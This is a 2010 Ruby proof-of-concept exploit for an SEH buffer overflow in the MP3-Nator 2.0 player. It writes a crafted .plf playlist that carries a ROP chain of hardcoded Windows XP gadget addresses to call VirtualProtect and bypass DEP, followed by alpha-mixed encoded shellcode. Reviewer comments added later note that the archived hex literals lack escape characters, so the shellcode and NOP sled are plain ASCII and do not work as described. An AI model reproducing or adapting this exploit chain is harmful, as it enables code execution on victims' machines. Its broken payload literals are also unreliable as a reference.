
# Title : MP3-Nator Buffer Overflow (SEH - DEP BYPASS)
# Published : 2010-11-18
# Author : Muhamad Fadzil Ramli


# Exploit Title: Exploit Buffer Overflow MP3-Nator (SEH - DEP BYPASS)
# Date: 18-11-2010
# Author: Muhamad Fadzil Ramli - mind1355[at]gmail[dot]com
# Credit/Bug Found By: C4SS!0 G0M3S
# Software Link: http://www.brothersoft.com/d.php?soft_id=16524&url=http://files.brothersoft.com/mp3_audio/players/mp3nator.zip
# Version: 2.0
# Tested on: Windows XP SP3 EN - Latest Update (VMWARE FUSION - Version 3.1.1)
# CVE: N/A
 
#! /usr/bin/env ruby
# Proof-of-concept file generator: assembles a fixed-size (10000-byte) .plf
# playlist named by `filename` and writes it to the current directory. Nothing
# is executed by this script itself; the written file is the artefact that the
# vulnerable player later parses.
#
# Defender notes (reviewer):
# - Every gadget/API address below is an absolute address annotated with its
#   module (WS2_32.dll, xaudio.dll, msvcrt.dll, ...) and is never relocated, so
#   the artefact is tied to the exact module layout of the "Tested on" platform
#   given in the header (Windows XP SP3 EN).
# - The output is easy to characterise: exactly 10000 bytes, the first 4112
#   bytes padded out with 'A', the remainder padded with 'C' (see the size
#   arithmetic near the end). Derive detection content from that structure
#   rather than from the hex literals.
# - NOTE(review): the hex-string literals below (shellcode, nops) and the
#   `-b 'x00'` in the msfencode comment carry no escape characters in this
#   archived copy, so as written they evaluate to printable ASCII text rather
#   than the bytes the comments describe.
filename = 'crash.plf'

# ./msfpayload windows/exec CMD=calc EXITFUNC=seh R | ./msfencode -e x86/alpha_mixed -b 'x00' -t ruby
# [*] x86/alpha_mixed succeeded with size 456 (iteration=1)
# Payload literal as archived; see the NOTE(review) in the header about escapes.
shellcode =
"x89xe3xdaxcfxd9x73xf4x58x50x59x49x49x49x49" +
"x49x49x49x49x49x49x43x43x43x43x43x43x37x51" +
"x5ax6ax41x58x50x30x41x30x41x6bx41x41x51x32" +
"x41x42x32x42x42x30x42x42x41x42x58x50x38x41" +
"x42x75x4ax49x49x6cx4dx38x4dx59x47x70x43x30" +
"x47x70x43x50x4ex69x48x65x50x31x48x52x43x54" +
"x4cx4bx51x42x46x50x4ex6bx50x52x44x4cx4cx4b" +
"x50x52x46x74x4ex6bx51x62x45x78x46x6fx4cx77" +
"x43x7ax47x56x50x31x49x6fx45x61x49x50x4ex4c" +
"x47x4cx45x31x43x4cx47x72x44x6cx51x30x4fx31" +
"x48x4fx46x6dx43x31x49x57x4bx52x4ax50x46x32" +
"x43x67x4cx4bx46x32x46x70x4ex6bx43x72x47x4c" +
"x47x71x48x50x4cx4bx47x30x43x48x4bx35x4bx70" +
"x50x74x43x7ax47x71x4ex30x42x70x4cx4bx51x58" +
"x42x38x4cx4bx42x78x51x30x46x61x48x53x49x73" +
"x47x4cx43x79x4ex6bx44x74x4ex6bx45x51x49x46" +
"x46x51x49x6fx45x61x4bx70x4cx6cx4fx31x48x4f" +
"x46x6dx43x31x4ax67x47x48x4dx30x50x75x48x74" +
"x47x73x43x4dx4ax58x45x6bx43x4dx47x54x42x55" +
"x4bx52x50x58x4cx4bx50x58x45x74x47x71x4ex33" +
"x51x76x4ex6bx44x4cx42x6bx4ex6bx46x38x45x4c" +
"x45x51x4ex33x4ex6bx44x44x4cx4bx46x61x4ax70" +
"x4fx79x50x44x44x64x44x64x51x4bx43x6bx51x71" +
"x43x69x50x5ax42x71x4bx4fx4dx30x46x38x43x6f" +
"x50x5ax4cx4bx47x62x48x6bx4fx76x43x6dx43x5a" +
"x43x31x4cx4dx4ex65x48x39x45x50x47x70x47x70" +
"x46x30x42x48x46x51x4ex6bx42x4fx4ex67x49x6f" +
"x4ex35x4dx6bx4bx4ex46x6ex44x72x4ax4ax50x68" +
"x4cx66x4ax35x4fx4dx4fx6dx4bx4fx48x55x47x4c" +
"x47x76x43x4cx46x6ax4dx50x4bx4bx4dx30x44x35" +
"x45x55x4fx4bx47x37x47x63x43x42x50x6fx51x7a" +
"x45x50x42x73x4bx4fx49x45x45x33x43x51x50x6c" +
"x51x73x45x50x47x7ax41x41"

# Leading filler; `junk1` is rebuilt below as the full first 4112 bytes.
junk1 	=  'A' * 28

# ROP1
rop1	=  ''
rop1	<< [0x71ABDAC3].pack('V')	# PUSH ESP # POP ESI # RETN 	[Module : WS2_32.dll]
rop1	<< [0x71ABDC56].pack('V')   # MOV EAX,ESI # POP ESI # RETN 	[Module : WS2_32.dll]
rop1	<< "DEAD"					# PADDING
rop1	<< [0x1001595E].pack('V')	# ADD ESP,20 # RETN - xaudio.dll

# VIRTUALPROTECT PARAMETERS
# The four 'WWWW'..'ZZZZ' placeholders are only markers; rop2 below is meant
# to overwrite them at run time, so the file on disk still contains the letters.
params	= ''
params	<< [0x7C801AD4].pack('V')	# VirtualProtect
params	<< 'WWWW'					# return address [ PARAM #1 ]
params	<< 'XXXX'					# lpAddress      [ PARAM #2 ]
params	<< 'YYYY'					# Size           [ PARAM #3 ]
params	<< 'ZZZZ'					# flNewProtect   [ PARAM #4 ]
params	<< [0x5ADA1005].pack('V')	# writeable address
params	<< 'BEEF' * 2				# PADDING

# ROP2 - [ PARAM #1 ]
rop2	=  ''
rop2	<< [0x775D1578].pack('V')	# PUSH EAX # POP ESI # RETN 	[Module : ole32.dll]
rop2	<< [0x77C4EC2B].pack('V')	# ADD EAX,100 # POP EBP # RETN 	[Module : msvcrt.dll]
rop2	<< "BEEF"					# PADDING
rop2	<< [0x77C4EC2B].pack('V')	# ADD EAX,100 # POP EBP # RETN 	[Module : msvcrt.dll]
rop2	<< 'BEEF'					# PADDING
rop2	<< [0x77E8416B].pack('V')	# MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN 	[Module : RPCRT4.dll]
rop2	<< 'BEEF'

# ROP2 - [ PARAM #2 ]
rop2	<< [0x775D1578].pack('V')	# PUSH EAX # POP ESI # RETN 	[Module : ole32.dll]
rop2	<< [0x77C4EC2B].pack('V')	# ADD EAX,100 # POP EBP # RETN 	[Module : msvcrt.dll]
rop2	<< 'BEEF'					# PADDING
rop2	<< [0x77157D1D].pack('V') * 4 # INC ESI # RETN 	[Module : oleaut32.dll]
rop2	<< [0x77E8416B].pack('V')	# MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN 	[Module : RPCRT4.dll]
rop2	<< 'BEEF'

# rop2 - [ PARAM #3 ]
rop2	<< [0x775D1578].pack('V')	# PUSH EAX # POP ESI # RETN 	[Module : ole32.dll]
rop2	<< [0x77E8559E].pack('V')	# XOR EAX,EAX # RETN 	[Module : RPCRT4.dll]
rop2	<< [0x77C4EC2B].pack('V')	# ADD EAX,100 # POP EBP # RETN 	[Module : msvcrt.dll]
rop2	<< 'BEEF'					# PADDING
rop2	<< [0x77C4EC2B].pack('V')	# ADD EAX,100 # POP EBP # RETN 	[Module : msvcrt.dll]
rop2	<< 'BEEF'					# PADDING
rop2	<< [0x77C4EC2B].pack('V')	# ADD EAX,100 # POP EBP # RETN 	[Module : msvcrt.dll]
rop2	<< 'BEEF'					# PADDING
rop2	<< [0x77157D1D].pack('V') * 4 # INC ESI # RETN 	[Module : oleaut32.dll]
rop2	<< [0x77E8416B].pack('V')	# MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN 	[Module : RPCRT4.dll]
rop2	<< 'BEEF'

# rop2	- [ PARAM #4 ]
rop2	<< [0x775D1578].pack('V')	# PUSH EAX # POP ESI # RETN 	[Module : ole32.dll]
rop2	<< [0x77E8559E].pack('V')	# XOR EAX,EAX # RETN 	[Module : RPCRT4.dll]
rop2	<< [0x77C4EC1D].pack('V')	# ADD EAX,40 # POP EBP # RETN 	[Module : msvcrt.dll]
rop2	<< 'BEEF'					# PADDING
rop2	<< [0x77157D1D].pack('V') * 4 # INC ESI # RETN 	[Module : oleaut32.dll]
rop2	<< [0x77E8416B].pack('V')	# MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN 	[Module : RPCRT4.dll]
rop2	<< 'BEEF'

# POINT ESP TO VIRTUALPROTECT
rop2	<< [0x7475B960].pack('V')	# XCHG EAX,ESP # RETN 	[Module : MSCTF.dll]
# As archived this is 310 copies of the three ASCII characters "x90", not 310 NOP bytes.
nops	= "x90" * 310

# Pad the whole prefix to exactly 4112 bytes with 'A'. String#* raises
# ArgumentError ("negative argument") if the assembled prefix ever exceeds
# 4112 bytes, so this line doubles as a length sanity check.
junk1	= junk1 + rop1 + params + rop2 + nops + shellcode + 'A' * (4112 - (junk1 + rop1 + params + rop2 + nops + shellcode).length)

# Four bytes placed at offset 4112, immediately after the padded prefix.
seh		=  [0x10019C35].pack('V')	# ADD ESP,41C # RETN - xaudio.dll
# Trailing 'C' filler brings the total file size to exactly 10000 bytes.
junk2	=  'C' * (10000 - (junk1 + seh).length)
xploit	= junk1 + seh + junk2

# Write the artefact; the block form closes the handle on exit. `.to_s` inside
# the interpolation is redundant (interpolation already calls to_s).
File.open(filename,'w') do |fd|
	fd.write xploit
	puts "file size : #{xploit.length.to_s}"
end